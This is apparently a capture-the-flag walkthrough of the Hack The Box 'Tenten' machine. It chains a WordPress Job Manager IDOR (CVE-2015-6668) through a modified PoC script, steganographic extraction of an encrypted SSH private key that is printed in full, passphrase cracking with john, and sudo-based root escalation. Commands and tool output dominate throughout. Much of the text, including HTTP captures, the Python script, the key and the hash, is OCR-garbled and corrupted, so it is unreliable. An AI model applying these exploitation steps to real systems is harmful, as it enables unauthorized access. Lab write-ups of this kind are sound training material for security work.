HTB – Tenten Walkthrough

nmap

Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; I ssh-hostkey: 2048 (RSA) 256 (ECDSA) 256 (ED25519) 80/tcp open http Apache httpd 2.4. 18 ( (Ubuntu)) I http-generator: WordPress 4.7.3 I http-methods: Supported methods: GET HEAD POST OPTIONS I http-server-header: Apache/ 2.4. 18 (Ubuntu) I http-title: Job Portal – Just another WordPress site Service Info: OS: Linux; CPE: kernel protocol 2.0)

WPScan – enumerate users

wpscan --url http://10.10.10.10 -log --enumerate u NOTE: Gem.gunzip is deprecated; use Gem: : Util.gunzip instead. It will be removed on or after 2018-12-01. Gem. gunzip called from /usr/lib/ruby/vendor ruby/ unicode/display width/ index. rb:5. The supplied log file / root/ .wpscan/log.txt already exists. If you continue the new output will be appended. Do you want to continue? [Y les [N]o, default: [N] WordPress Security Scanner by the WPScan Team Version 2.9.4 Sponsored by Sucuri https://sucuri.net @ WPScan , @ethicalhack3r, @erwan I r, @ FireFart It seems like you have not updated the database for some time Last database update: 2019-03-18 Do you want to update now? [Y les [NIO [A] bort update, default: Updating the Database . Update completed URL: http://10.10.10.10/ Started: Sat Jul 6 2019 Interesting header: LINK: <http://10. 10. 10. 10/ index.php/wp-json/>; Interesting header: SERVER: Apache/ 2.4. 18 (Ubuntu) XML-RPC Interface available under: http://10.10.10. 10/xmlrpc.php Found an RSS Feed: http://10.10.10. 10/ index.php/feed/ [HTTP 200] Detected 1 user from RSS feed: I Name I I takis I rel="https : // api . w. org/" [HTTP 405]

WPScan – Plugin Vulnerability (IDOR) found

[+] Enumerating plugins | 1 plugin found: from passive detection . v7.2.5 Name: job-manager - Latest version: O. 7.25 (up to date) Last updated: Location: http://10. 10. 10. 10/wp-content/plugins/job-manager/ Readme: http://10. 10. 10. 10/wp-content/plugins/job-manager/readme. txt Title: Job manager <= O. 7.25 Insecure Direct Object Reference Reference: https://wpvulndb.com/vulnerabilities/8167 Reference: https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668 Enumerating usernames . We identified the following 1 user: I ID I Login I Name Il I takis I takis Job I

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

As the PoC explained in the above URL, I tried to upload CV files first

Request Raw Para ms Can tent Can tent Can tent Can tent Headers Hex Response Raw Headers ETT?/I.1 200 0K Hex HTML (Ubuntu} Re nder farm-data; iab:nan -field-Il" farm-data; iab:nan -field- It" farm-data; iab:nan -field-15" Sat, 06 Jul 201g Server: Apache/ 2 . Z. 18 Vary: Accept -Encoding Content -Length: Cannectian: c lase field-16" filename=" $7 WOE Can tent - iType: text/ html; charset=L1iT? •8 html > Cht:nl lang=" en •US" na Chead;• -width, Clink href="http: //g.mpg . arg/xfn/ll";• •:script;• (function (html} Chtm1.c1assName = initial-scale=l farm-data; iab:nan - Can tent - 'Type i:nage/png tb . png td$ html . className . replace ( /\bno -js\b/, • j s • (document . documentE1ement} ; Application Job < / script* z g c Iy z 1 kw w 3 c dwxS 5. h 6 1 z / nyt} : A cYhJ7a a Eh ya 6 y El # c 3 8 6 1 shh dns •prefetch' href=' / / fan t s. gaagleapis. cam' dns•prefetch' href=' // s. w. arg' /;• httpg: // fants.gstatic. cam' crassarigin rel='precannect' alternate" type=" title=" href="http: // 10. 10. 10. 10/ index. php/feed/" /;• alternate" type=" title=" Clink Clink Clink Clink Clink rel=' rel=' href= ' re re JOE Part al JOE Part al •ragua ; •ragua ; Feed" Feed" OKU + z g a r k gEJ 17 3 5 6 f CeGW E x g h Cib G Per e- 7 g 7 \ 1 zOM ytE1 .:SW 00. href="http: // 10. 10. 10. 10/ index. /;• •:script type=" text/iavascript";• window._wpemoj i Settings = C "baseUr1" "https. \ / \ / s . w. i 1/2 . 2 . , "ext" . png" , svgUr1" "https \ / \ / s . w. i 1/2 . 2. , svgExt" . svg" , source" C "concatemoj i" "http 10 . 10 . 10\/wp - includes\/j s \ / wp -emoj i -release . min. j 7 . 3" ; function (a, b, c} [function d (a} [var b , c , d, e , f=String. fromCharCode ; if kl I k. fill Text} return! 1 ; switch (k. clearRect O , O , j . width, j . heig ht} , k. , k. 32px Arial" , a} [case" flag" • return k. fillText (f (55356, 56826, 55356, 56819} , O, , . toDataURL U . length<3e3} (k. (0, o, j . widt h,) . height} , k. fillText (f (55356, 57331, 65039, 8205, 55356, 57096} , O, , . toDataURL , k. , o, j . width, j . height} , k. fillText (f (55356, 57331, 55356, 57096} , O, , . toDataURLU , h ; case "emo j i4" I return k. fillText (f (55357, 56425, 55356, 57341, 8205, 55357, 56507} , O, . toDataURLU , k. clearRect o, j . w idth,j . height} , k. fillText (f (55357, 56425, 55356, 57341, 55357, 56507} , O, , . toDataURL urn! 1} function e [var c=b . createE1ement script" ; c . src=a , c . defer=c . type=" text/ javascript" , b . getE1ementsByTagName ( "he etl otJl Done 1 ib K k Glh 1 ad"} [01 . appendChi1d (c} y var =b createE1ement ("canvas"} Type a search term O matches Type a search , . . getContext ; for i=Array flag" , "emoj term 54.877 bytes O matches 1.881 mills

Since wp saves the uploaded files as /wp-content/uplaods/{year}/{month}/{file name}

I checked if the I uploaded exist, and yes it’s uploaded

10.10.10.10 /wp-content/uploads/2019/07/htb.png

Also in HTML code of application page, I observed that the uploaded application name appears 

I brute forced the pages (idor vulnerability) and interesting application name appeared

curl -s http://10.10.10. 10/ index.php/jobs/apply/8/ I grep <title>Job Application: Pen Tester – Job for i in $(seq 1 20); do echo -n , curl -s http://10.10.10. 10/ index.php/jobs/apply/$i/ I grep done 1: 2: 3: 4: 5: 6: 7: 8: 9: 11: 12: 13: 14: 15: 16: 17: 18: 19: 20: <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job <title>Job Application : Hello world! – Job Portal</title> Application : Sample Page – Job Application : Auto Draft – Job Application – Job Application : Jobs Listing – Job Portal</title> Application : Job Application – Job Application : Register – Job Portal</title> Application : Pen Tester – Job Application : – Job Portal</title> Application : Application – Job Application : cube – Job Application : Application – Job Application : HackerAccessGranted Application : Application – Job Application : htb – Job Portal</title> Application : Application – Job Application : htb – Job Portal</title> Application – Job Application – Job Application – Job root@kati : /home/kaIisa/HTB/tenten#

One can also do the brute force via Burp Intruder

Attack Save Columns Results Target Positions Filter: Showing all Items Payload Request Payloads Render Options Status 200 200 200 200 200 200 200 200 200 200 200 200 200 200 200 200 200 Error initial Timeout 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Length 57855 57857 57854 57839 57748 57850 57865 57847 57855 57810 57860 57844 57862 57906 57748 57748 57748 Request Response Raw Headers Hex ETT?/I.1 200 0K Sat, 06 Jul 201g Server: Apache/ 2 . a. 18 (Ubuntu} Vary: Accept •Encoding Content-Length: 57713 Cannectian: c lase Can tent - iType: text/ html; charset=L1iT? •8 Cht:nl lang=" en •US" class—Una-is na•svg";• Chead;• -width, Clink href="http: //gmpg.arg/xfn/ll";• •:script;• (function (html} Chtm1.c1assName = html. className.rep1ace Comment (document . documentE1ement} ; c/ script* Clink Clink Clink Clink Clink rel=' rel=' href= ' re re Application. HackerAccessGrantedl Job Portal" title* dns •prefetch' href=' / / fan t s. gaagleapis. cam' dns•prefetch' href=' // s. w. arg' /;• httpg: // fants.gstatic. cam' crassarigin rel='precannect' alternate" type=" application/ rss+x.ml" title=" alternate" title=" Jab Part al JOE Part al •ragua ; •ragua ; cc ript C"baseUr1" "https, type=" text/ iavascript";• window._wpemoj i Settings = w. \ /emoj i \ / 2 . 2 . 11/721721/" , "ext" Peed" href="http: // 10. 10. 10. 10/ index. php/feed/" /;• Peed" href="http: // 10. 10. 10. 10/ index. /;• . png" , svgUr1" "https. \ / \ / s . w. i \ / 2 . 2. , svgExt" . svg" , source" C "concatemoj i" "http 10

I used the PoC exploit in the blogpost above and modified the exploit a bit as below:

import requests print CVE-2015-6668 Title: CV filename disclosure on Job-manager WP Plugin Author: Evangelos mourikis Blog: https://vagmour.eu Plugin URL: http://www.wp-jobmanager.com Versions: «=0.7 .25 = raw input( 'Enter a vulnerable website. website = raw input( 'Enter a file name. filename filename2 = filename. replace( for year in for i in , 'gif' , 'pngl}: for extension in {'doc' , 'pdf' , 'docx' , ' jpg' , ' jpeg' URL = website + "/wp-content/uploads/" + str(year) + + . format (i) + + filename2 + • + extension req = requests. get (URL) if req. status print [+] URL of CV found! + URL

And found a file with the name HackerAccessGranted

python cve-2015-6668.py CVE-2015-6668 Title: CV filename disclosure on Job-manager WP Plugin Author: Evangelos mourikis Blog: https://vagmour.eu Plugin URL: http://www.wp-jobmanager.com Versions: Enter a vulnerable website: http://10.10.10.10 Enter a file name: HackerAccessGranted [+] URL of CV found! http://10. 10. 10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

I downloaded the jpg file and checked for any info hidden in it using the following tools

strings HackerAccessGranted.jpg | less

exiftool HackerAccessGranted.jpg

binwalk HackerAccessGranted.jpg

steghide –extract -sf HackerAccessGranted.jpg (-sf for source file option)

extracting options: s f, --stegofile -sf <filename> p, - -passphrase -p <passphrase> xf, --extractfile -xf <filename> f, -- force q, --quiet v, --verbose select stego file extract data from specify passphrase use <passphrase> to extract data select file name for extracted data write the extracted data to <filename> overwrite existing files suppress information messages display detailed information options for the info command: p, - -passphrase -p <passphrase> specify passphrase use <passphrase> to get info about embedded data To embed emb.txt in cvr.jpg: steghide embed -cf cvr.jpg -ef emb.txt To extract embedded data from stg. jpg: steghide extract -sf stg. jpg steghide --extract -sf HackerAccessGranted.jpg Enter passphrase: wrote extracted data to "id rsa" .

Look the content of id_rsa file

-BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DE-K-lnfo: AES-128-C8C, 7265FC656C429769E4CIEEFC618E660C /HXcU80T3Jhzb1H7uF9Vh7faa76XH1dr/ChOpDnJunjdmLS/1aq1ku1Q3/RF/Vax tj Tzj /V5h8EcL5GcHv3es romsoj rkpawfbvwbR+XxFIJuz7zLfd/vDo 1KuGrCrRRsipkyae5Kiq1C137bmWK9aE/4c5X2yfVTOEeODdWOrAoTzGufWtThZf K2nyOiTGPndD7LMdm/0505As+ChDYFNphVIXDgfDzHgonKMC4iES7Jk8Gz20PJsm SdWCazF6p1Eqh14NQrnkd8kmKqzkpfWqZDz3æg6f49GYf97aM5TQgTday20FqoXH WPhK3CmOtMGqLZA01æoNuwXSOH53t9FG7GqU31wj7nAGW8pfGodGwedYde4z108P VbNu1RMKOkErv/NCiGVRcK6k5Qtdbwforh+6bmjmKE6QvMXbesZtQOgC9SJZ31MT JOIY838HQZgOsSw1jDrxuPV2DUIYFROW3kQrDVUym080xOwOf/MITxvrC2wvbHqw AAniuEotb90az/Pfau300/DVzYkq199VDX/Y81xd168qqZbXsM9s/aMCdVg7TJ1g 2gxE1pV7U9kxi1/RNdx5UASFpvFs1mOn7CTZ6N44xiatQUHyVINgpNCyjfEmzxmo 6FtWaVqbGStax1iMRC198ZOcRkX2VoTvT1hQw74rSPGPMEH+OSFksXp7Se/wCDMA pYZASVx160NWQGpAj5z4Wha8S8Er8ZVmFfykuh4107Tsnxa9WNoWX06XOFSOPMk tNp8bPPq15+M+dSZaObad9E/mnv8faSKlvkn4epk87nOVk01ssLcecfxi+bWnGPm KowyqU6iuF28w1J98towgnWrUgt1qubmkOwkf+108ig7komyT9KfZegR70F92xE9 41WDTxfLy7501DHORrmOf77D4HvNC2qQOdYHkApd1dk4b1cb71Fi5WF183RruygF 2GSre8yXn5g915Ya82uC30+ST5Q8eY2pT88k2D61kmt6u11LnoOSkr3v9r6JT5J7 LOUtmgdUqf+35æcA70L/w11POE04UOaaGpscDg059DL88dzv1hyHg4T1fd9xWtQS VxmzURTwEZ43j SxX94PL lwcxzLV6FfRVAKdbi6kACsgVeULi1+YAfPj 11yVOm1kv 5HV/bYJvVatGtmkNumtuK7NOH8iE7kCDxCnPnPZaOnWoHDk4yd50R1zznkPna74r Xb09FdNeLNmER/7GGdQARkpd52Uur08f1JW2wyS1bdgb8gw/G+puFAR8z7ipgj4W p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxmrv7TvHUSSWEUC409QKi83amgf ywmjw30tH+ZLn8my/fS61VQ50nV6rVhQ7+LRKeæq1Yidzfp1911L8Uidbs8fWAz8 9XkOsH5c1NQT6spo/nQM3UN1kknæa7zKPJmetHs040b3xKLiSpw5f35SRV4rF+mO v1UE1/YssXM07TK6i81XCuuOUtOpGiLxNVR1aJvbGmazLWCSyptk5fJhPLkhuK+J YoZn9FNAuRiYFL3rw+6q01+KoqzoPJJek6WHRy80SE+8Dz1ysTLIP86tGKn7EWnP END RSA PRIVATE KEY----- id r sa (END)

Since it’s encrypted, we need to decrypt it first to use it

Turn the file into john crackable form with sshng2john tool

python sshng2john.py id rsa > id john cat id john 16 id rsa:$sshng$1$16$7265FC656C429769E4CIEEFC618E660C$1200$fc75dc501393dc98736e51fbb85f5587b7da6bbe971c876bfc2874a439c9ba78dd98b4bf95aab592e950dff445fd56b1b634f 38ff5798411 8eOdd5b4acOa 13cc6b9f5ad4e 165f2b69f2d224c63e7743ecb3 9262aace4a5f5aa643cf7faoe9fe3d1987fdeda3394d081375acb6a05aa85c758f84adc29b4b4c1aa2d9034d7ea0dbb05d2d07e77b7d146ec6a94df5c23ee7006581a5f1a8746c1e75875ee3394e04 16de442bOd55329 b4068c4ecOe7ff3254f1bebOb6c2f6c7ab00009e2b84a2d6fda1acff3df6aedce3bfOd5cd892a23df550d7fd8048c5dd7af2aa996d7bOcf6cfda30275583b4c9d60daOc4496957b53d9318a5fd135d c79500485a6f16c9663a7ec24d9e8de38c626ad4141f2575360a4dOb28df10ccd7328e85b56695a9b192b5ac7588c442d7df19d1c4645f65684ef4e5850c3be2b48f18f3041fe392164b17a7b49eff 0083300a58640495c65ea835640afa9023e73e1685a052044afc6559857f292e878968ed3b27c5af56368597a3a5f415238f324b4da416cf3ead79f8cf9d49968e6da77d13f327bc17da48a96f927e lea6407b9f45643b5b2c2dc79c7f lee817ddb 113de085834f 17cbcbbe68d43 1292bde ff6be894f927b2f452d320754a9ffb7e7e700ef42ffc0894fd04d3853469a1a9b1cOeOd39f432fcf1dcef221c878384e57ddf715ad4125713335114f0119e378d2c57f783cb970731ccb57a15f4550 Oa75b8ba9000ac8157942e223ec807cf8c82325749b592fe4757f6d826f55ab46b6690db8cb6e2bb34e1fc884ee4083c429cf9cf65ad275a81c3938c9de74465cf39e43e76bbe2b5dba3d15d35e2cd 98447fec619d400464a5de7652eaf4f 11b883e7353378eb4aOOa2ff9df9b32bcdb36dd3f 132bbfb4ef Id449258450 1355448689bdb la66b32d6092ca9b64e5f2613cb921b8af89628667f45 340b9189814bdebc3eeaaa25f8aa2ace83c925e93a587472foe484fbc0f3d72b132c83c1ead18a9fb1169cf root@kati : /home/kaIisa/HTB/tenten#

Then crack the passphrase

john id john --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSI-I [RSA/DSA/EC/OPENSSH (SSI-I private keys) 32/32]) Cost 1 (KDF/cipher [O=MD5/AES 1=MD5/3DES 2=8crypt/AES]) is O for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 Openmp threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status superpassword (id rsa)

Change the permission of rsa file to 600 and login to takis user with the passphrase cracked

chmod 600 id rsa ssh -i id r sa takis@10.10.10.10 Enter passphrase for key 'id rsa' : Welcome to Ubuntu 16.04.2 L TS (GNU/ Linux 4.4.0-62-generic x86 64) * Documentation: * management: * Support: https://help . ubuntu . com https // landscape . canonical . com https : //ubuntu . com/advantage 65 packages can be updated. 39 updates are security updates. Last login: Fri may 5 2017 takis@tenten : —$

Priv Esc

takis@tenten:—$ sudo -l matching Defaults entries for takis on tenten: env reset, mail badpass, secure User takis may run the following commands on tenten: (ALL : ALL) ALL (ALL) NOPASSWD: /bin/fuckin

So takis user can run /bin/fuckin as root 

The content of the file can be seen below, it gets arguments and executes them

/ bin/ bash /bin/fuckin (END)

We use sudo /bin/fuckin bash and become root

takis@tenten:—$ cat /bin/fuckin / bin/ bash takis@tenten:—$ sudo /bin/fuckin bash whoami root root@tenten :

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.